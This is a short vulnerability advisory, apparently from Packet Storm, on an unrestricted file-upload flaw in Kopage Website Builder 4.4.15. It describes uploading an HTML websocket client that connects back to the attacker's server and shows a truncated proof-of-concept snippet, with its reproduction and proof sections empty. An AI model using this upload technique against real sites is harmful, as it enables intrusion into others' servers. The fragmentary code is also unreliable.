Kopage Website Builder 4.4.15 Shell Upload
2023-12-8 23:38:37 Author: packetstormsecurity.com(查看原文) 阅读量:3 收藏

## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE
## Author: nu11secur1ty
## Date: 12/08/2023
## Vendor: https://www.kopage.com/
## Software: https://demo.kopage.com/index.php
## Reference: https://portswigger.net/web-security/file-upload,

## Description:
The file upload function suffers from file upload vulnerability, there
is no strong sanitizing function for uploading some extension files.
In this case, I uploaded an HTML web socket client on their server and
then I connected this client with my javascript server =)
Depending on the scenario, this can be the end of privacy and even
worse than ever!
I am a Penetration Tester, not a stupid cracker! Thank you all!

STATUS: CRITICAL Vulnerability

[+]Exploit client:
(() => {
const ws = new WebSocket('ws://')
ws.onopen = () => {
console.log('ws opened on browser')
ws.send('hello world you are hacked :D')

ws.onmessage = (message) => {
console.log(`message received ${message}`)



## Reproduce:

## Proof and Exploit:

## Time spent:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>

文章来源: https://packetstormsecurity.com/files/176111/kopagewb4415-shell.txt